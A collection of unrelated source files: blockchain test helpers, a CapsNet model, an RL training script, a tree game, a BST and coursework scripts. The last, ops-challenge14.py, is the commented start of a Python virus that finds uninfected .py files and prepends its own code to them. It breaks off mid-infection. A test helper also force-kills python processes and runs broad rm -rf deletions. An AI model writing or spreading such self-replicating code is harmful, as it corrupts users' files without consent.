await StubCollection().create_score_stub(conf.LOOPCHAIN_DEFAULT_CHANNEL, 'score_package')
await StubCollection().score_stubs[conf.LOOPCHAIN_DEFAULT_CHANNEL].async_task().hello()
logging.debug(f'{StubCollection().amqp_key} score hello complete')
return process, StubCollection().score_stubs[conf.LOOPCHAIN_DEFAULT_CHANNEL]
def print_testname(testname):
print("\n======================================================================")
print("Test %s Start" % testname)
print("======================================================================")
def make_key_value_store(store_identity="") -> KeyValueStore:
    store_default_path = './' + ("db_test" if store_identity == "" else store_identity)
store_path = store_default_path
store = None
retry_count = 0
while store is None and retry_count < conf.MAX_RETRY_CREATE_DB:
try:
uri = f"file://{store_path}"
store = KeyValueStore.new(uri, create_if_missing=True)
logging.debug(f"make key value store uri: {uri}")
except KeyValueStoreError:
store_path = store_default_path + str(retry_count)
retry_count += 1
return store
def close_open_python_process():
# ubuntu patch
if platform == "darwin":
os.system("pkill -f python")
os.system("pkill -f Python")
else:
os.system("pgrep -f python | tail -$((`pgrep -f python | wc -l` - 1)) | xargs kill -9")
def clean_up_temp_db_files(kill_process=True):
from pathlib import Path
loopchain_root = Path(os.path.dirname(loopchain.__file__)).parent
if kill_process:
close_open_python_process()
print(f"loopchain root : {loopchain_root}")
os.system(f'rm -rf $(find {loopchain_root} -name db_*)')
os.system(f'rm -rf $(find {loopchain_root} -name *test_db*)')
os.system(f'rm -rf $(find {loopchain_root} -name *_block)')
os.system(f"rm -rf {loopchain_root}/testcase/db_*")
os.system(f"rm -rf {loopchain_root}/.storage")
time.sleep(1)
def clean_up_mq():
os.system("rabbitmqctl stop_app")
os.system("rabbitmqctl reset")
os.system("rabbitmqctl start_app")
def create_basic_tx(peer_auth: Signer) -> Transaction:
"""
:param peer_auth:
:return: transaction
"""
tx_builder = TransactionBuilder.new("0x3", TransactionVersioner())
tx_builder.private_key = peer_auth._private_key
tx_builder.to_address = Address("hx3f376559204079671b6a8df481c976e7d51b3c7c")
tx_builder.value = 1
tx_builder.step_limit = 100000000
tx_builder.nid = 3
return tx_builder.build()
def add_genesis_block():
tx_info = None
channel = conf.LOOPCHAIN_DEFAULT_CHANNEL
if "genesis_data_path" in conf.CHANNEL_OPTION[channel]:
genesis_data_path = conf.CHANNEL_OPTION[channel]['initial_genesis_block_data_file_path']
util.logger.spam(f"Try load a file of initial genesis block from ({genesis_data_path})")
try:
with open(genesis_data_path) as json_file:
tx_info = json.load(json_file)["transaction_data"]
util.logger.spam(f"generate_genesis_block::tx_info >>>> {tx_info}")
except FileNotFoundError as e:
exit(f"cannot open json file in ({genesis_data_path}): "
f"{e}")
block = Block(channel_name=channel)
block.block_status = BlockStatus.confirmed
genesis_validator = get_genesis_tx_validator(channel)
is_valid, tx = genesis_validator.init_genesis_tx(tx_info)
if is_valid:
block.put_genesis_transaction(tx)
block.generate_block()
    # Add the genesis block.
return block
class TestServerManager(metaclass=SingletonMetaClass):
"""
"""
def __init__(self):
self.__test_port_diff = random.randrange(1, 30) * -50
self.__radiostation_port = conf.PORT_RADIOSTATION + self.__test_port_diff
# rs and peer info is tuple (process, stub_manager, port)
self.__rs_info = ()
self.__peer_info = {} # {num:peer_info}
self.__score = None
def start_servers(self, peer_count, score=None):
"""Start BlockChain network rs and peer
:param peer_count: num of peers but 0 means start only RS.
:return:
"""
logging.debug("TestServerManager start servers")
self.__score = score
# run radio station
process, stub_manager = run_radio_station_as_process_and_stub_manager(self.__radiostation_port)
self.__rs_info = (process, stub_manager, self.__radiostation_port)
time.sleep(2)
for i in range(peer_count):
peer_port = conf.PORT_PEER + (i * 7) + self.__test_port_diff
process, stub_manager = run_peer_server_as_process_and_stub_manager(
peer_port, self.__radiostation_port, score=score)
self.__peer_info[i] = (process, stub_manager, peer_port)
time.sleep(2)
def stop_all_server(self):
for i in self.__peer_info:
self.__peer_info[i][1].call_in_times(
"Stop",
loopchain_pb2.StopRequest(reason="TestServerManager"), conf.GRPC_TIMEOUT)
self.__rs_info[1].call_in_times(
"Stop",
loopchain_pb2.StopRequest(reason="TestServerManager"), conf.GRPC_TIMEOUT)
time.sleep(2)
for i in self.__peer_info:
self.__peer_info[i][0].join()
self.__rs_info[0].join()
def stop_peer(self, num):
self.__peer_info[num][1].call_in_times(
"Stop",
loopchain_pb2.StopRequest(reason="TestServerManager"), conf.GRPC_TIMEOUT)
time.sleep(2)
self.__peer_info[num][0].join()
def start_peer(self, num):
peer_port = conf.PORT_PEER + (num * 7) + self.__test_port_diff
process, stub_manager = run_peer_server_as_process_and_stub_manager(
peer_port, self.__radiostation_port, score=self.__score)
self.__peer_info[num] = (process, stub_manager, peer_port)
time.sleep(1)
def add_peer(self):
num = 0
return num
def get_stub_rs(self):
return self.__rs_info[1].stub
def get_stub_peer(self, num=0):
return self.__peer_info[num][1].stub
def get_port_rs(self):
return self.__radiostation_port
def get_port_peer(self, num):
return self.__peer_info[num][2]
def status(self):
"""
:return: json object for ServerManager status
"""
pass
``` |
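`TestServerManager` above wraps the `run_*_as_process` helpers into a small fixture that starts one radio station plus a number of peers. A minimal usage sketch, assuming the module is importable as `testcase.unittest.test_util` (the path in the file header); the method names are the ones defined above:
```python
# Hypothetical fixture usage for a two-peer local network.
from testcase.unittest.test_util import TestServerManager

manager = TestServerManager()
manager.start_servers(peer_count=2)            # radio station + two peers
try:
    peer_stub = manager.get_stub_peer(0)       # gRPC stub of the first peer
    print("peer 0 port:", manager.get_port_peer(0))
finally:
    manager.stop_all_server()                  # sends Stop to every peer and the radio station
```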
{
"source": "jinwooklim/My-DML-SfM-Caps-Odometry-TF",
"score": 3
} |
#### File: My-DML-SfM-Caps-Odometry-TF/backup/capsnet.py
```python
import tensorflow as tf
from config import cfg
from euler_to_rotation import yaw_to_rotation
epsilon = 1e-9
#
# Capsule layers
#
class CapsNet():
def __init__(self):
pass
def squash(self, v):
"""Return squashed v."""
square_norm = tf.reduce_sum(tf.square(v), -2, keep_dims=True)
return square_norm / (1 + square_norm) * v / tf.sqrt(square_norm + epsilon)
def conv_caps(self, input, num_outputs, kernel_size, stride, vec_len):
"""Return PrimaryCaps layer, convolutional capsule layer."""
caps = tf.contrib.layers.conv2d(input, num_outputs * vec_len,
kernel_size, stride, padding="VALID",
activation_fn=tf.nn.relu)
caps = tf.reshape(caps, [cfg.batch_size, -1, vec_len, 1])
caps = self.squash(caps)
return caps
def fc_caps(self, input, num_outputs, vec_len):
"""Return DigitCaps layer, fully connected layer."""
with tf.variable_scope('routing'):
# NOTE: Choose one to use
uh = self.conv_to_fc_0(input) # Original, correct
caps = self.routing(uh, num_outputs)
caps = tf.squeeze(caps, axis=1)
return caps
# Original, correct implementation
# from <http://github.com/naturomics/CapsNet-Tensorflow>.
def conv_to_fc_0(self, u):
"""Return FC-wise contribution from conv capsules to digit capsules."""
# Shape u for tf.matmul(W, u)
# reshape: [bs, 1152, 8, 1] => [bs, 192, 1, 8, 1]
# ^^^^ ^^^^^^^
# tile: [bs, 1152, 1, 8, 1] => [bs, 192, 10, 8, 1]
# ^ ^^
u = tf.reshape(u, [cfg.batch_size, -1, 1, 8, 1])
u = tf.tile(u, [1, 1, cfg.num_of_class, 1, 1])
#assert u.get_shape() == [cfg.batch_size, 1152, 10, 8, 1]
# W: [bs, 1152, 10, 8, 1], tf.tile bach_size times
W = tf.get_variable('Weight', shape=[1, 1152, cfg.num_of_class, 8, 1], dtype=tf.float32,
initializer=tf.random_normal_initializer(stddev=cfg.stddev))
W = tf.tile(W, [cfg.batch_size, 1, 1, 1, 1])
#assert W.get_shape() == [cfg.batch_size, 1152, 10, 8, 1]
# Eq.2, uh
# [bs, 1152, 10, 8, 1].T x [bs, 192, 10, 8, 1] => [bs, 192, 10, 16, 1]
uh = tf.matmul(W, u, transpose_a=True)
#assert uh.get_shape() == [cfg.batch_size, 1152, 10, 1, 1]
return uh
def routing(self, uh, num_outputs):
"""Route by dynamic agreement."""
# In forward (inner iterations), uh_stopped = uh.
# In backward, no gradient passed back from uh_stopped to uh.
uh_stopped = tf.stop_gradient(uh, name='stop_gradient')
b = tf.zeros([cfg.batch_size, uh.shape[1].value, num_outputs, 1, 1]) # b: [bs, 1152, 10, 1, 1]
for r_iter in range(cfg.iter_routing):
with tf.variable_scope('iter_' + str(r_iter)):
c = tf.nn.softmax(b, dim=2) # [bs, 1152, 10, 1, 1]
# At last iteration, use `uh` in order to receive gradients from the following graph
if r_iter == cfg.iter_routing - 1:
# weighting uh with c, element-wise in the last two dims
s = tf.reduce_sum(tf.multiply(c, uh), axis=1, keep_dims=True)
v = self.squash(s)
#assert v.get_shape() == [cfg.batch_size, 1, 10, 1, 1]
elif r_iter < cfg.iter_routing - 1:
# Inner iterations, do not apply backpropagation
s = tf.reduce_sum(tf.multiply(c, uh_stopped), axis=1, keep_dims=True)
v = self.squash(s)
# tile from [batch_size ,1, 10, 1, 1] to [batch_size, 1152, 10, 16, 1]
# for matmul, in the last two dim: [1, 1].T x [16, 1] => [1, 1]
v_tiled = tf.tile(v, [1, 1152, 1, 1, 1])
uh_produce_v = tf.matmul(uh_stopped, v_tiled, transpose_a=True) # Agreement
#assert uh_produce_v.get_shape() == [cfg.batch_size, 1152, 10, 1, 1]
b += uh_produce_v
return(v)
#
# Network architecture
#
def model(self, conv1, num_source):
        """Return the capsule network."""
        self.num_source = num_source
with tf.variable_scope('Conv1_layer'):
print("caps_conv1 : ", conv1.get_shape())
pass
#conv1 = tf.contrib.layers.conv2d(X, num_outputs=256,
# kernel_size=9, stride=1,
# padding='VALID')
#assert conv1.get_shape() == [cfg.batch_size, 20, 20, 256]
with tf.variable_scope('PrimaryCaps'):
#caps1 = self.conv_caps(conv1, num_outputs=32, kernel_size=9, stride=2, vec_len=8)
caps1 = self.conv_caps(conv1, num_outputs=32, kernel_size=4, stride=2, vec_len=8)
#caps1 = self.conv_caps(conv1, num_outputs=32, kernel_size=2, stride=1, vec_len=8)
with tf.variable_scope('DigitCaps'):
caps2 = self.fc_caps(caps1, num_outputs=cfg.num_of_class, vec_len=1)
return caps2
def predict(self, caps2):
"""Return prediction with argmax."""
with tf.variable_scope('Prediction'):
# softmax(|v|), where v: [bs, 10, 1, 1]
v_length = tf.sqrt(tf.reduce_sum(tf.square(caps2), axis=2, keep_dims=True) + epsilon)
assert v_length.get_shape() == [cfg.batch_size, cfg.num_of_class, 1, 1]
softmax_v = tf.nn.softmax(v_length, dim=1)
# index of max softmax val among the 10 digit
prediction = tf.to_int32(tf.argmax(softmax_v, axis=1))
assert prediction.get_shape() == [cfg.batch_size, 1, 1]
prediction = tf.reshape(prediction, shape=(cfg.batch_size, ))
return v_length, prediction
def decoder(self, caps2, prediction):
"""Return decoder for reconstruction of image."""
# Masking
with tf.variable_scope('Masking'):
# batch size of predictions (labels)
candid = []
for index in range(cfg.batch_size):
v = caps2[index][prediction[index], :] # [1, 1]
candid.append(tf.reshape(v, shape=(1, 1, 1, 1)))
candid = tf.concat(candid, axis=0)
assert candid.get_shape() == [cfg.batch_size, 1, 1, 1]
# Reconstruct batch size of images with 3 FC layers
with tf.variable_scope('Decoder'):
v = tf.reshape(candid, shape=(cfg.batch_size, -1)) # [bs, 1, 1, 1] => [bs, 16]
fc1 = tf.contrib.layers.fully_connected(v, num_outputs=512)
fc2 = tf.contrib.layers.fully_connected(fc1, num_outputs=1024)
assert fc2.get_shape() == [cfg.batch_size, 1024]
#self.decoded = tf.contrib.layers.fully_connected(fc2, num_outputs=(self.num_source * 6 * cfg.batch_size), activation_fn=tf.sigmoid)
self.decoded = tf.contrib.layers.fully_connected(fc2, num_outputs=(self.num_source * 6), activation_fn=tf.sigmoid)
return self.decoded
def loss(self, X, Y, v_length, decoded):
"""Return loss."""
# These work by virtue of broadcasting (0, m_plus, m_minus),
# max_l = max(0, m_plus-||v_k||)^2
# max_r = max(0, ||v_k||-m_minus)^2
# v_length: [bs, 10, 1, 1]
max_l = tf.square(tf.maximum(0., cfg.m_plus - v_length))
assert max_l.get_shape() == [cfg.batch_size, cfg.num_of_class, 1, 1]
max_r = tf.square(tf.maximum(0., v_length - cfg.m_minus))
assert max_r.get_shape() == [cfg.batch_size, cfg.num_of_class, 1, 1]
# reshape: [bs, 10, 1, 1] => [bs, 10]
max_l = tf.reshape(max_l, shape=(cfg.batch_size, -1))
max_r = tf.reshape(max_r, shape=(cfg.batch_size, -1))
# 1. Margin loss (T == Y)
L = Y * max_l + cfg.lambda_val * (1 - Y) * max_r
margin_loss = tf.reduce_mean(tf.reduce_sum(L, axis=1))
'''
# 2. Reconstruction loss
origin = tf.reshape(X, shape=(cfg.batch_size, -1)) # 4x4
rx, ry, rz = yaw_to_rotation(origin[:,0])
rx_ry_rz = tf.transpose(tf.stack([rx, ry, rz])) # 4x3
origin = tf.concat([rx_ry_rz, origin[:,1:]], 1) # 4x6
temp = origin
#print("decoded : ", decoded.get_shape())
#print("before_origin : ", origin.get_shape())
for i in range((cfg.batch_size*self.num_source)-1):
origin = tf.concat([origin, temp], 1)
#print("after_origin : ", origin.get_shape())
squared = tf.square(decoded - origin) # 4x(6*num_source) - 4x(6*num_source)
#origin = tf.concat([origin, origin], 1) # 4x8
#squared = tf.square(decoded - origin) # 4x8 - 4x8
reconstruction_loss = tf.reduce_mean(squared)
'''
origin = tf.reshape(X, shape=(cfg.batch_size, -1)) # (batch_size, 6)
decoded = tf.reshape(decoded, shape=(cfg.batch_size, self.num_source, -1))
print("#1 decoded : ", decoded.get_shape())
rz = tf.reshape(decoded[:,:,-1], shape=(cfg.batch_size, self.num_source, 1))
print("#2 rz : ", rz.get_shape())
decoded = tf.concat([decoded[:,:,:3], rz], 2)
decoded = tf.reduce_mean(decoded, 1)
squared = tf.square(decoded - origin) # (4,4) - (4, 4)
reconstruction_loss = tf.reduce_mean(squared)
# 3. Total loss
# The paper uses sum of squared error as reconstruction error, but we have
# used reduce_mean to calculate MSE. In order to keep in line with the
# paper, the regularization scale should be 0.0005*784=0.392
self.capsnet_total_loss = margin_loss + cfg.regularization_scale * reconstruction_loss
return margin_loss, reconstruction_loss, self.capsnet_total_loss
def train_op(self, total_loss, global_step):
"""Return train operation."""
optimizer = tf.train.AdamOptimizer()
return optimizer.minimize(total_loss, global_step=global_step)
def summary(self, decoded, margin_loss, reconstruction_loss, capsnet_total_loss):
"""Return train summary."""
train_summary = []
train_summary.append(tf.summary.scalar('train/margin_loss', margin_loss))
train_summary.append(tf.summary.scalar('train/reconstruction_loss', reconstruction_loss))
train_summary.append(tf.summary.scalar('train/capsnet_total_loss', capsnet_total_loss))
#recon_img = tf.reshape(decoded, shape=(cfg.batch_size, 28, 28, 1))
#train_summary.append(tf.summary.image('reconstruction_img', recon_img))
self.train_summary = tf.summary.merge(train_summary)
return self.train_summary
def accuracy(self, labels, prediction):
"""Return accuracy."""
correct_prediction = tf.equal(tf.to_int32(labels), prediction)
return tf.reduce_sum(tf.cast(correct_prediction, tf.float32))
``` |
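The `squash` method above implements the CapsNet nonlinearity v' = (|v|^2 / (1 + |v|^2)) * v / |v|, which preserves a capsule's direction while compressing its length into [0, 1). A standalone NumPy sketch of the same formula, independent of the TensorFlow graph, useful for sanity-checking shapes and output lengths:
```python
import numpy as np

def squash_np(v, axis=-2, eps=1e-9):
    # Same formula as CapsNet.squash above: scale by |v|^2 / (1 + |v|^2), then normalize.
    square_norm = np.sum(np.square(v), axis=axis, keepdims=True)
    return square_norm / (1.0 + square_norm) * v / np.sqrt(square_norm + eps)

vec = np.ones((1, 3, 8, 1))            # three capsules with 8-dimensional pose vectors
out = squash_np(vec)
print(np.linalg.norm(out, axis=-2))    # every length is strictly below 1 (here 8/9)
```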
{
"source": "JinwooPark00/TreeGame_dev",
"score": 3
} |
#### File: JinwooPark00/TreeGame_dev/board.py
```python
import random
from Tiles import WaterTile, LightTile, EventTile
class Board:
def __init__(self, players): #players would be {'number': player object}
self.players = players
self.rounds_played = 0
self.upper_bound = 5
self.lower_bound = [1]
self.season = ['Spring', 'Summer', 'Fall', 'Winter']
self.season_num = 0
self.board = []
for i in range(48):
x = random.randint(0, 100)
if x < 45:
self.board.append(WaterTile())
elif 45 <= x < 90:
self.board.append(LightTile())
else:
self.board.append(EventTile())
# for i in range(1, len(self.board)):
# if self.board[i] == self.board[i - 1] and self.board[i].isinstance(WaterTile()):
# self.board[i] = LightTile()
# elif self.board[i] == self.board[i - 1] and self.board[i].isinstance(LightTile()):
# self.board[i] = WaterTile()
def get_tile(self, i):
return self.board[i]
def change_season(self, season):
for i in self.board:
i.season = season
def probability(self):
if self.players[list(self.players.keys())[len(self.players) - 1]].turn_count == self.players[list(self.players.keys())[0]].turn_count:
self.rounds_played += 1
if self.rounds_played > 6:
if random.randint(1,5) in self.lower_bound:
if self.season_num + 1 > 3:
self.end_game()
else:
self.season_num += 1
self.change_season(self.season[self.season_num])
self.lower_bound = [1]
self.rounds_played = 0
else:
self.lower_bound.append(self.lower_bound[len(self.lower_bound) - 1] + 1)
def end_game(self):
pass
```
#### File: TreeGame_dev/Tiles/tile.py
```python
class Tile:
multipliers = {'Spring': 2, 'Summer': -1, 'Fall': 1, 'Winter': 0}
def __init__(self):
self.height = 10
self.width = 10
self.color = 'White'
self.season = ''
def event(self, player):
pass
``` |
{
"source": "jinwoop/on-policy",
"score": 2
} |
#### File: scripts/train/train_football.py
```python
import os
from pathlib import Path
import sys
import socket
# third-party packages
import numpy as np
import setproctitle
import torch
import wandb
# code repository sub-packages
from onpolicy.config import get_config
from onpolicy.envs.football.Football_Env import FootballEnv
from onpolicy.envs.env_wrappers import SubprocVecEnv, DummyVecEnv
def make_train_env(all_args):
def get_env_fn(rank):
def init_env():
if all_args.env_name == "Football":
env = FootballEnv(all_args)
else:
print("Can not support the " +
all_args.env_name + " environment.")
raise NotImplementedError
env.seed(all_args.seed + rank * 1000)
return env
return init_env
if all_args.n_rollout_threads == 1:
return DummyVecEnv([get_env_fn(0)])
else:
return SubprocVecEnv([get_env_fn(i) for i in range(
all_args.n_rollout_threads)])
def make_eval_env(all_args):
def get_env_fn(rank):
def init_env():
if all_args.env_name == "Football":
env = FootballEnv(all_args)
else:
print("Can not support the " +
all_args.env_name + " environment.")
raise NotImplementedError
env.seed(all_args.seed * 50000 + rank * 10000)
return env
return init_env
if all_args.n_eval_rollout_threads == 1:
return DummyVecEnv([get_env_fn(0)])
else:
return SubprocVecEnv([get_env_fn(i) for i in range(
all_args.n_eval_rollout_threads)])
def parse_args(args, parser):
parser.add_argument("--scenario_name", type=str,
default="academy_3_vs_1_with_keeper",
help="which scenario to run on.")
parser.add_argument("--num_agents", type=int, default=3,
help="number of controlled players.")
parser.add_argument("--representation", type=str, default="simple115v2",
choices=["simple115v2", "extracted", "pixels_gray",
"pixels"],
help="representation used to build the observation.")
parser.add_argument("--rewards", type=str, default="scoring",
help="comma separated list of rewards to be added.")
parser.add_argument("--smm_width", type=int, default=96,
help="width of super minimap.")
parser.add_argument("--smm_height", type=int, default=72,
help="height of super minimap.")
parser.add_argument("--remove_redundancy", action="store_true",
default=False,
help="by default False. If True, remove redundancy features")
parser.add_argument("--zero_feature", action="store_true",
default=False,
help="by default False. If True, replace -1 by 0")
parser.add_argument("--eval_deterministic", action="store_false",
default=True,
help="by default True. If False, sample action according to probability")
parser.add_argument("--share_reward", action='store_false',
default=True,
help="by default true. If false, use different reward for each agent.")
parser.add_argument("--save_videos", action="store_true", default=False,
help="by default, do not save render video. If set, save video.")
parser.add_argument("--video_dir", type=str, default="",
help="directory to save videos.")
all_args = parser.parse_known_args(args)[0]
return all_args
def main(args):
parser = get_config()
all_args = parse_args(args, parser)
if all_args.algorithm_name == "rmappo" or all_args.algorithm_name == "rmappg":
assert (all_args.use_recurrent_policy or all_args.use_naive_recurrent_policy), ("check recurrent policy!")
elif all_args.algorithm_name == "mappo" or all_args.algorithm_name == "mappg":
assert (all_args.use_recurrent_policy == False and all_args.use_naive_recurrent_policy == False), ("check recurrent policy!")
else:
raise NotImplementedError
# cuda
if all_args.cuda and torch.cuda.is_available():
print("choose to use gpu...")
device = torch.device("cuda:0")
torch.set_num_threads(all_args.n_training_threads)
if all_args.cuda_deterministic:
torch.backends.cudnn.benchmark = False
torch.backends.cudnn.deterministic = True
else:
print("choose to use cpu...")
device = torch.device("cpu")
torch.set_num_threads(all_args.n_training_threads)
# run dir
run_dir = Path(os.path.split(os.path.dirname(os.path.abspath(__file__)))[
0] + "/results") / all_args.env_name / all_args.scenario_name / all_args.algorithm_name / all_args.experiment_name
if not run_dir.exists():
os.makedirs(str(run_dir))
# wandb
if all_args.use_wandb:
run = wandb.init(config=all_args,
project=all_args.env_name,
entity=all_args.wandb_name,
notes=socket.gethostname(),
name="-".join([
all_args.algorithm_name,
all_args.experiment_name,
"rollout" + str(all_args.n_rollout_threads),
"minibatch" + str(all_args.num_mini_batch),
"epoch" + str(all_args.ppo_epoch),
"seed" + str(all_args.seed)
]),
group=all_args.scenario_name,
dir=str(run_dir),
job_type="training",
reinit=True)
else:
if not run_dir.exists():
curr_run = 'run1'
else:
exst_run_nums = [int(str(folder.name).split('run')[1]) for folder in run_dir.iterdir() if str(folder.name).startswith('run')]
if len(exst_run_nums) == 0:
curr_run = 'run1'
else:
curr_run = 'run%i' % (max(exst_run_nums) + 1)
run_dir = run_dir / curr_run
if not run_dir.exists():
os.makedirs(str(run_dir))
setproctitle.setproctitle("-".join([
all_args.env_name,
all_args.scenario_name,
all_args.algorithm_name,
all_args.experiment_name
]) + "@" + all_args.user_name)
# seed
torch.manual_seed(all_args.seed)
torch.cuda.manual_seed_all(all_args.seed)
np.random.seed(all_args.seed)
# env init
envs = make_train_env(all_args)
eval_envs = make_eval_env(all_args) if all_args.use_eval else None
num_agents = all_args.num_agents
config = {
"all_args": all_args,
"envs": envs,
"eval_envs": eval_envs,
"num_agents": num_agents,
"device": device,
"run_dir": run_dir
}
# run experiments
if all_args.share_policy:
from onpolicy.runner.shared.football_runner import FootballRunner as Runner
else:
from onpolicy.runner.separated.football_runner import FootballRunner as Runner
runner = Runner(config)
runner.run()
# post process
envs.close()
if all_args.use_eval and eval_envs is not envs:
eval_envs.close()
if all_args.use_wandb:
run.finish()
else:
runner.writter.export_scalars_to_json(str(runner.log_dir + '/summary.json'))
runner.writter.close()
if __name__ == "__main__":
main(sys.argv[1:])
``` |
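The flags registered in `parse_args` above extend the base options coming from `get_config`. A hypothetical invocation sketch that drives `main()` directly with an argument list; the flags not shown in `parse_args` (env_name, algorithm_name, experiment_name, seed) are assumed to be defined by `get_config`, and all values are illustrative only:
```python
# Hypothetical programmatic launch; equivalent to passing the same flags on the command line.
from onpolicy.scripts.train.train_football import main  # assumed import path

main([
    "--env_name", "Football",
    "--algorithm_name", "mappo",
    "--experiment_name", "demo",
    "--scenario_name", "academy_3_vs_1_with_keeper",
    "--num_agents", "3",
    "--representation", "simple115v2",
    "--seed", "1",
])
```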
{
"source": "jinwoov/dsa-practice",
"score": 4
} |
#### File: py/binaryTree/binarySearchTree.py
```python
from node import Node
from binaryTree import BinaryTree
class BinarySearchTree:
def __init__(self):
self.root = None
def insert(self, roots: Node, val):
if(self.root is None):
node = Node(val)
self.root = node
else:
if(roots is None):
node = Node(val)
roots = node
return roots
else:
if(roots.value >= val):
roots.left = self.insert(roots.left, val)
else:
roots.right = self.insert(roots.right, val)
return roots
def contains(self, roots, searchVal):
if(roots is None):
return False
else:
if(roots.value == searchVal):
return True
elif(roots.value >= searchVal):
return self.contains(roots.left, searchVal)
else:
return self.contains(roots.right, searchVal)
bst = BinarySearchTree()
bst.insert(bst.root, 5)
bst.insert(bst.root, 3)
bst.insert(bst.root, 4)
bst.insert(bst.root, 7)
bst.insert(bst.root, 8)
result = bst.contains(bst.root, 7)
print(result)
# bt = BinaryTree()
# #bt.preOrder(bst.root)
# #bt.inOrder(bst.root)
# # bt.postOrder(bst.root)
# bt.breadthFirst(bst.root)
```
#### File: py/linkedlist/nodeLL.py
```python
class Node:
def __init__(self,val):
self.value = val
self.next = None
``` |
{
"source": "jinwoov/OPS301",
"score": 4
} |
#### File: OPS301/ops-challenge/ops-challenge09.py
```python
pokemon = ["Pikachu", "Charmander ", "Bulbasaur", "Onyx", "Eevee", "Gangar", "Grimer", "Rattat", "Pidgey", "Mew"]
cities = []
# Declaration of functions
def getElement(num, numTwo):
print(pokemon[num:numTwo])
def changeElement(num, string):
pokemon[num] = string
def askUser():
    userInput = input("What would you like to add? ")
return userInput
# Main
## Print the fourth element of the list.
getElement(3,4)
## Print the sixth through tenth element of the list.
getElement(5,10)
## Change the value of the seventh element to "onion".
changeElement(6, "onion")
getElement(6,7)
### STRETCH GOAL
cities.append(askUser())
print(f"This is whats in the array: {cities}")
cities.clear()
print(f"This is whats in the array after clear(): {cities}")
cities = pokemon.copy()
print(f"This is whats in the array after clear(): {cities}")
# End
```
#### File: OPS301/ops-challenge/ops-challenge11.py
```python
from os import remove
# Script Name: Ops Challenge: Class 11
# Author: <NAME>
# Date of last revision: 09/14/2020
# Description of purpose: Able to perform file manipulation
# Declare the variables
## File path to the text file
filePath = "./jedi.txt"
# Declare the functions
## Writing into the file
def writeFile(file):
file1 = open(file, "w")
file1.writelines("May\n")
file1.writelines("the\n")
file1.writelines("force be with you")
file1.close()
## reading the file
def readFile(file):
file1 = open(file, "r")
print(file1.readlines()[0])
file1.close()
## Erase the File
def removeFile(file):
remove(file)
print("file is gone")
# Main
writeFile(filePath)
readFile(filePath)
removeFile(filePath)
# END
```
#### File: OPS301/ops-challenge/ops-challenge13.py
```python
from requests import get, post, put, delete, head, patch, options, auth
## library utilized to get current user's username
import getpass
import os
import time
# Script Name: Ops Challenge: Class 13
# Author: <NAME>
# Date of last revision: 09/16/2020
# Description of purpose: To perform HTTP protocols through user's input. Every input from user will determine the final outcome.
# Declaring variable
requestArr = ["GET", "POST", "PUT", "DELETE", "HEAD", "PATCH", "OPTIONS"]
# Declaring function
## Main interface with error handling
def mainMenu():
try:
count = 1
print(f"Hi {getpass.getuser()}! What do you want to perform?")
for r in requestArr:
print(f"{str(count)}. {r}")
count += 1
userChoice = input("Choice --> ")
        if(int(userChoice) > len(requestArr) or int(userChoice) < 1):
raise ValueError
userChoice = int(userChoice) - 1
requestMethod(requestArr[userChoice])
except ValueError:
print("You entered wrong choice!!")
exit(0)
## request method (refactored)
def requestMethod(method):
if(validateChoice(method)):
response = eval(str.lower(method))(url)
statCode = int(response.status_code)
statusCodes(statCode)
# Final output after running the query to the given URL
def statusCodes(statCode):
timeOut()
if (statCode >= 100 and statCode < 200):
print(colors.fg.orange,f"{getpass.getuser()}, you got informational querying response from {url}")
elif (statCode >= 200 and statCode < 300):
print(colors.fg.green,f"{getpass.getuser()}, your response came back querying successful from {url}")
elif (statCode >= 300 and statCode < 400):
print(colors.fg.orange,f"{getpass.getuser()}, you were redirected querying from {url}")
elif (statCode >= 400 and statCode < 500):
print(colors.fg.red,f"{getpass.getuser()}, you done mess up querying from {url}")
else:
print(colors.fg.red,f"{getpass.getuser()}, Server had error to your request from {url}")
print(colors.reset)
## Validating if the choice was yes
def validateChoice(choice):
userOption = input(f"You chose to perform {choice} method to {url}. Do you want to proceed (y)es/(n)o? ")
if(userOption == "y" or userOption == "yes" or userOption == "Y" or userOption == "Yes"):
return True
else:
return False
## what site does user want to query
def whatSite():
url = input("which site do you want to request? ")
while (len(url) < 3):
print(colors.fg.red,"You entered wrong url", colors.reset)
url = input("which site do you want to request? ")
if(url.__contains__("https") == False):
url = f"https://{url}"
return url
### HELPER FUNCTION
## class that contains default color that can be used for console
class colors:
reset='\033[0m'
class fg:
green='\033[32m'
red='\033[0;31m'
orange = '\033[33m'
## timeout to give user a realistic experience
def timeOut():
print("Querying.....")
time.sleep(2)
#checking if its int parsable
def checkParsable(num):
try:
        int(num)
return True
except ValueError:
return False
### STRETCH GOAL
## Calling authentication to the GitHub api
def authentication():
username = input("Type your username: ")
password= input("Type your password: ")
    response = get("https://api.github.com/user",
                   auth=auth.HTTPBasicAuth(username, password))
print(response.status_code)
# MAIN
url = whatSite()
mainMenu()
authentication()
exit(0)
# END
```
#### File: OPS301/ops-challenge/ops-challenge14.py
```python
import os
import datetime
# assigning string virus to the variable
SIGNATURE = "VIRUS"
# This is a function to output an array. It inserts files that hasn't had word, virus, in the python file and append
# it to the array
def locate(path):
# creating an empty list, array
files_targeted = []
# listing the directory from that path argument that this function is taking in and assigning that to filelist
filelist = os.listdir(path)
# running a for loop to access files/folders in the directory path
for fname in filelist:
# if the specified path is an existing directory it will return boolean true otherwise false
if os.path.isdir(path+"/"+fname):
            # hitting true from the previous if logic, the following statement will recurse the locate function again
# and seeing if there is more folder in this directory
            files_targeted.extend(locate(path+"/"+fname))
# if the file's third index from the back is python file it will enter into this if logic
elif fname[-3:] == ".py":
# this sets infected variable as false
infected = False
# running for loop iteration to print out line by line
for line in open(path+"/"+fname):
# if the line in the python file contains word, virus, then it will set variable to true and
# break out of this for loop
if SIGNATURE in line:
infected = True
break
# if previous if logic never hit, then the python file didn't contain virus so infected will be still
# set to be false, hence it will hit this logic and put the file into the files_targeted array
if infected == False:
files_targeted.append(path+"/"+fname)
# returning the array at the end
return files_targeted
# this function is designed to override python files that doesn't have virus string and concatenating the virus file with current files content.
def infect(files_targeted):
    # open this script itself via its absolute path
virus = open(os.path.abspath(__file__))
#declaring a variable call virusstring and attach it with empty string
virusstring = ""
#running the for loop to access the file and output each line in that file
for i,line in enumerate(virus):
        # if i is greater than or equal to 0 and less than 39, this if logic will hit
if i>=0 and i <39:
# storing each lines within line 0 to line 39 of string into the `virusstring` variable
virusstring += line
# closing the open file from the memory
    virus.close()
    # running a for loop to access the filenames within the files_targeted array
for fname in files_targeted:
# declaring a variable call f and assigning the open file in the files_targeted array to the variable f
f = open(fname)
